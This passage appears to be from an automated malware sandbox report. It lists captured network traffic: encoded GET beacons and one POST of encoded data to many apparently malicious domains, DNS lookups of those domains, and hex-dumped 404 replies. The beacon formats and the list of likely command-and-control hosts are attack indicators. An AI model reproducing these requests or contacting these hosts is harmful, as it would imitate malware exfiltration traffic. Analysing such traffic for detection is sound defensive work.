            Source: global trafficHTTP traffic detected: GET /deo6/?7Bohe=NByBCVC4fvk3zNlObrJyagJtuzfI3YQ4Ad7pkV0ATPDcP1/VdlZwhks7LZ4Zlk95UTsGsfg9gVB7u8RemM4hoUvK2Ig2OY9rZRI88AWKe5yd8pSEv6a6wulMHxqZW9lecA==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.b-ambu.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /r966/?vD=h0e85v&7Bohe=St0zOmS57JvxXHngaoKRrYwJhw67SG7V3FAZs2TYvCYNXtW49c+AatXE2ZBTP/KNdGCD9DmtL2naWYac77vyUP4q1YSJ6U5Kf8MwRQ43aJ1o9SgGH2ER+UvSNI1J5J1sVQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.livpure-grab.onlineConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /4nqw/?7Bohe=TM4wmIiUDmnTKniklQ90uhNUhJ9wAlE9nf/Yl9jXXOP3K1JO7ypWLJJbcPRG/mn1E4sifjVCDcv63SEcY+fHR48yBI63+DhGjujcAAYsRe1/gzF87OhGQiowvZSxcJ02Hg==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.bandukchi.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /djad/?7Bohe=OgBIZAb3K3QVmDSyooTSIAO5Tll+jwwdUI93t9cTrZTAkguQuNIIHt4CXXwiEPUK7V7i0FBLQRxFESBesMpHDzV+LIhV5qbZyNO4rVJKeHZqQ73AKCfxWCZcLIU2txA0ig==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.mcse.topConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /2vbz/?7Bohe=qlAZWX/ch455H6hDeAWyjxeCoVjeFLImmNyoFLJZcRWWfOSwb/dYbmE5Lo+ESXiDiuCMQOi3bdztXr54sGaKYuw5X5+G7ZC+wzrMILyG35q/IsHjv6ziuhAlYbb1UGsQUw==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.voidzero.techConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /cvus/?7Bohe=L6/IgR7jnWgHAqCUWtdTnyQ3KOMoF6iy/gVxl52J0nU+SVs5srMG6NDyylAnxUOxWBqWqLnFW3nZioCT6UqXKC7zbsKc4BTPzCMAY+nXmzAcPovgamuSI2ghdEMnHjenpA==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.huwin.clubConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /vhqd/?7Bohe=WoZBIA9oyl+J2b4VfTP9l9A782ZII/35uSr01551g8NzakXtA+Pa5+JAPkHp6kowgs8acnK71ZwIZDZByVYOuYH08N3N2lAmC4I9AOVCDFEu0aUC6s+F7cMMpoEI61JPvA==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.xueerr.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /z0t0/?7Bohe=9B/xOqaHJLGzhK9+asydflyTnlILmfDyrXYYsxrw44oQhSljsJ3AUyXQia4yxUul1qSv48mAxItuxzOnZ7dQ4iYj8ngc1biNZhlnUORZPI7XnMKBVwak16kasN63mT84/Q==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.onlineblikje.onlineConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /3x2e/?7Bohe=LxBS6Twi9uZYinzDVhZFrrwHDjbbsejF2aCFyI0NTfR3MRAzX3VYMflTVpKBnal2v445F0Z9ZuD89KJE1ZsSKujcQCdh/qxt+vHDLhQvad3slFytU7/EPl4Sr/TZznzmuw==&vD=h0e85v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.rtpsilva4d.clickConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficDNS traffic detected: DNS query: www.dxfwrc2h.sbs
            Source: global trafficDNS traffic detected: DNS query: www.nieuws-july202491.sbs
            Source: global trafficDNS traffic detected: DNS query: www.putizhong.homes
            Source: global trafficDNS traffic detected: DNS query: www.coba168.info
            Source: global trafficDNS traffic detected: DNS query: www.everyone.golf
            Source: global trafficDNS traffic detected: DNS query: www.royapop.online
            Source: global trafficDNS traffic detected: DNS query: www.jy58gdwf7t.skin
            Source: global trafficDNS traffic detected: DNS query: www.b-ambu.com
            Source: global trafficDNS traffic detected: DNS query: www.livpure-grab.online
            Source: global trafficDNS traffic detected: DNS query: www.bandukchi.com
            Source: global trafficDNS traffic detected: DNS query: www.mcse.top
            Source: global trafficDNS traffic detected: DNS query: www.voidzero.tech
            Source: global trafficDNS traffic detected: DNS query: www.huwin.club
            Source: global trafficDNS traffic detected: DNS query: www.xueerr.xyz
            Source: global trafficDNS traffic detected: DNS query: www.onlineblikje.online
            Source: global trafficDNS traffic detected: DNS query: www.rtpsilva4d.click
            Source: unknownHTTP traffic detected: POST /4bpc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.nieuws-july202491.sbsOrigin: http://www.nieuws-july202491.sbsCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 206Referer: http://www.nieuws-july202491.sbs/4bpc/User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4Data Raw: 37 42 6f 68 65 3d 62 34 30 56 31 37 68 34 48 72 58 79 79 39 6d 78 6a 43 53 35 45 34 4f 66 70 47 75 57 68 57 67 48 45 4b 2f 32 4a 6e 43 58 39 39 4f 36 30 4b 2f 57 35 49 43 57 46 4f 6f 4f 44 6a 68 66 62 58 35 59 62 76 4c 4a 4c 4b 44 6e 32 7a 75 4f 46 54 71 5a 69 69 32 51 61 6d 43 65 38 37 79 50 54 68 76 39 4b 79 6b 6a 78 74 45 69 34 2b 78 46 31 66 64 5a 5a 4e 31 68 78 76 55 61 79 46 50 55 70 69 6e 76 44 2f 59 73 74 45 74 4d 4c 77 58 46 75 4b 64 63 4e 54 54 67 4f 71 4e 68 76 47 74 52 6d 6a 62 73 69 62 31 31 73 4e 57 35 58 57 75 5a 77 72 32 49 39 61 61 48 69 66 58 73 30 51 77 55 57 74 36 55 64 39 6a 39 61 4d 63 3d Data Ascii: 7Bohe=b40V17h4HrXyy9mxjCS5E4OfpGuWhWgHEK/2JnCX99O60K/W5ICWFOoODjhfbX5YbvLJLKDn2zuOFTqZii2QamCe87yPThv9KykjxtEi4+xF1fdZZN1hxvUayFPUpinvD/YstEtMLwXFuKdcNTTgOqNhvGtRmjbsib11sNW5XWuZwr2I9aaHifXs0QwUWt6Ud9j9aMc=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Thu, 24 Oct 2024 13:17:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 24 Oct 2024 13:17:50 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 52 4d 55 cf 68 03 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 4b 76 6d 28 fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 5d 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 d4 fb 59 96 69 47 7e d1 cb 00 4c 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e0 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 a2 67 95 5b dc e8 c3 09 cb 3c 36 81 2e ac 38 b3 a3 ff 83 ed be f6 f8 33 81 46 6e 77 7a 66 f2 3e 76 3d a0 25 b3 ae b2 f7 9b bd 0c 17 cf 5a fc 71 fc 4d f6 01 8a 5c 5b e0 4d d2 af 00 91 79 96 96 ee 7d 98 7a d9 8d a0 af 7a 65 2f ed 6d ef ab e5 65 65 56 75 09 ac e3 b8 37 8b 2f a8 79 36 ff 10 41 fe e5 8f 56 17 ae 59 66 e9 e7 eb b1 e1 f5 fa 1e 92 9f 99 e0 8a b3 8b 4e ed ea 22 d7 97 ef 96 05 f2 f6 7b dd f7 81 e2 66 c3 57 69 91 4b fb 90 df 1e 4b 3d 30 80 
e3 7d a0 ae 2b b4 16 6e ee 9a c0 66 20 8c 3c ff 7c 23 d7 b3 7f 35 f3 75 57 8c c2 69 82 7e 3f ed 75 6c 72 69 6f 63 57 52 de 72 64 7e 22 d4 af 93 b8 0f 2b 37 29 6f c8 7c 47 12 06 70 f4 83 2b 85 e9 9b 2b 53 f8 27 40 bb b6 c7 0d f5 17 1c 5b 59 55 65 c9 c3 a0 df e3 4d d8 5e 5f 57 58 42 47 d7 83 57 9a 78 47 ff 56 0d bd b9 ef 1d d7 ce 0a b3 b7 df c3 00 84 14 b7 e8 83 d0 fb 8d 5e 35 0e e2 11 c3 5e 59 e3 d3 7d 1e 82 ac 71 8b 2b 7c bd 67 e3 c1 cb ec ba fc 7c d8 04 71 a6 b9 f5 9c 57 26 30 7a 44 50 a3 37 06 af 98 f8 1c c5 af 71 ed 23 43 fd 82 1a eb f8 c6 36 df 3d 2d 4c 2f 31 fb 83 98 17 87 65 75 7f 49 2b 3d e0 53 77 90 d5 55 19 82 80 d0 7f bc b1 df 1b f2 95 bb 9b 60 fc 1d 5e 57 fd 6f d2 02 9e e2 f0 86 2d 2f ce 7a ff ea 23 e3 fb 1d 2e 96 36 e3 d0 07 46 b6 c1 09 c1 2d de c6 df 48 7e bd f1 9b 17 d0 7f b4 d3 25 e1 82 1c f5 59 0c eb 03 c1 7d 98 98 fe ad 19 bf 0b f5 69 ec bd 2c ed 4f 39 20 41 dd ca d7 e7 dc f6 25 3f 5a 59 ec bc 49 d1 eb f1 5a ca 1f 75 d0 66 85 73 6f 01 8c 44 20 47 f5 7f ee cd 38 7e 4f e0 97 a4 02 49 1d 80 7b 00 74 05 b2 c4 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 24 Oct 2024 13:17:53 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 52 4d 55 cf 68 03 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 4b 76 6d 28 fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 5d 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 d4 fb 59 96 69 47 7e d1 cb 00 4c 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e0 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 a2 67 95 5b dc e8 c3 09 cb 3c 36 81 2e ac 38 b3 a3 ff 83 ed be f6 f8 33 81 46 6e 77 7a 66 f2 3e 76 3d a0 25 b3 ae b2 f7 9b bd 0c 17 cf 5a fc 71 fc 4d f6 01 8a 5c 5b e0 4d d2 af 00 91 79 96 96 ee 7d 98 7a d9 8d a0 af 7a 65 2f ed 6d ef ab e5 65 65 56 75 09 ac e3 b8 37 8b 2f a8 79 36 ff 10 41 fe e5 8f 56 17 ae 59 66 e9 e7 eb b1 e1 f5 fa 1e 92 9f 99 e0 8a b3 8b 4e ed ea 22 d7 97 ef 96 05 f2 f6 7b dd f7 81 e2 66 c3 57 69 91 4b fb 90 df 1e 4b 3d 30 80 
e3 7d a0 ae 2b b4 16 6e ee 9a c0 66 20 8c 3c ff 7c 23 d7 b3 7f 35 f3 75 57 8c c2 69 82 7e 3f ed 75 6c 72 69 6f 63 57 52 de 72 64 7e 22 d4 af 93 b8 0f 2b 37 29 6f c8 7c 47 12 06 70 f4 83 2b 85 e9 9b 2b 53 f8 27 40 bb b6 c7 0d f5 17 1c 5b 59 55 65 c9 c3 a0 df e3 4d d8 5e 5f 57 58 42 47 d7 83 57 9a 78 47 ff 56 0d bd b9 ef 1d d7 ce 0a b3 b7 df c3 00 84 14 b7 e8 83 d0 fb 8d 5e 35 0e e2 11 c3 5e 59 e3 d3 7d 1e 82 ac 71 8b 2b 7c bd 67 e3 c1 cb ec ba fc 7c d8 04 71 a6 b9 f5 9c 57 26 30 7a 44 50 a3 37 06 af 98 f8 1c c5 af 71 ed 23 43 fd 82 1a eb f8 c6 36 df 3d 2d 4c 2f 31 fb 83 98 17 87 65 75 7f 49 2b 3d e0 53 77 90 d5 55 19 82 80 d0 7f bc b1 df 1b f2 95 bb 9b 60 fc 1d 5e 57 fd 6f d2 02 9e e2 f0 86 2d 2f ce 7a ff ea 23 e3 fb 1d 2e 96 36 e3 d0 07 46 b6 c1 09 c1 2d de c6 df 48 7e bd f1 9b 17 d0 7f b4 d3 25 e1 82 1c f5 59 0c eb 03 c1 7d 98 98 fe ad 19 bf 0b f5 69 ec bd 2c ed 4f 39 20 41 dd ca d7 e7 dc f6 25 3f 5a 59 ec bc 49 d1 eb f1 5a ca 1f 75 d0 66 85 73 6f 01 8c 44 20 47 f5 7f ee cd 38 7e 4f e0 97 a4 02 49 1d 80 7b 00 74 05 b2 c4 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 24 Oct 2024 13:17:55 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 52 4d 55 cf 68 03 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 4b 76 6d 28 fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 5d 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 d4 fb 59 96 69 47 7e d1 cb 00 4c 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e0 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 a2 67 95 5b dc e8 c3 09 cb 3c 36 81 2e ac 38 b3 a3 ff 83 ed be f6 f8 33 81 46 6e 77 7a 66 f2 3e 76 3d a0 25 b3 ae b2 f7 9b bd 0c 17 cf 5a fc 71 fc 4d f6 01 8a 5c 5b e0 4d d2 af 00 91 79 96 96 ee 7d 98 7a d9 8d a0 af 7a 65 2f ed 6d ef ab e5 65 65 56 75 09 ac e3 b8 37 8b 2f a8 79 36 ff 10 41 fe e5 8f 56 17 ae 59 66 e9 e7 eb b1 e1 f5 fa 1e 92 9f 99 e0 8a b3 8b 4e ed ea 22 d7 97 ef 96 05 f2 f6 7b dd f7 81 e2 66 c3 57 69 91 4b fb 90 df 1e 4b 3d 30 80 
e3 7d a0 ae 2b b4 16 6e ee 9a c0 66 20 8c 3c ff 7c 23 d7 b3 7f 35 f3 75 57 8c c2 69 82 7e 3f ed 75 6c 72 69 6f 63 57 52 de 72 64 7e 22 d4 af 93 b8 0f 2b 37 29 6f c8 7c 47 12 06 70 f4 83 2b 85 e9 9b 2b 53 f8 27 40 bb b6 c7 0d f5 17 1c 5b 59 55 65 c9 c3 a0 df e3 4d d8 5e 5f 57 58 42 47 d7 83 57 9a 78 47 ff 56 0d bd b9 ef 1d d7 ce 0a b3 b7 df c3 00 84 14 b7 e8 83 d0 fb 8d 5e 35 0e e2 11 c3 5e 59 e3 d3 7d 1e 82 ac 71 8b 2b 7c bd 67 e3 c1 cb ec ba fc 7c d8 04 71 a6 b9 f5 9c 57 26 30 7a 44 50 a3 37 06 af 98 f8 1c c5 af 71 ed 23 43 fd 82 1a eb f8 c6 36 df 3d 2d 4c 2f 31 fb 83 98 17 87 65 75 7f 49 2b 3d e0 53 77 90 d5 55 19 82 80 d0 7f bc b1 df 1b f2 95 bb 9b 60 fc 1d 5e 57 fd 6f d2 02 9e e2 f0 86 2d 2f ce 7a ff ea 23 e3 fb 1d 2e 96 36 e3 d0 07 46 b6 c1 09 c1 2d de c6 df 48 7e bd f1 9b 17 d0 7f b4 d3 25 e1 82 1c f5 59 0c eb 03 c1 7d 98 98 fe ad 19 bf 0b f5 69 ec bd 2c ed 4f 39 20 41 dd ca d7 e7 dc f6 25 3f 5a 59 ec bc 49 d1 eb f1 5a ca 1f 75 d0 66 85 73 6f 01 8c 44 20 47 f5 7f ee cd 38 7e 4f e0 97 a4 02 49 1d 80 7b 00 74 05 b2 c4 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Thu, 24 Oct 2024 13:17:58 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 46 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 
20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
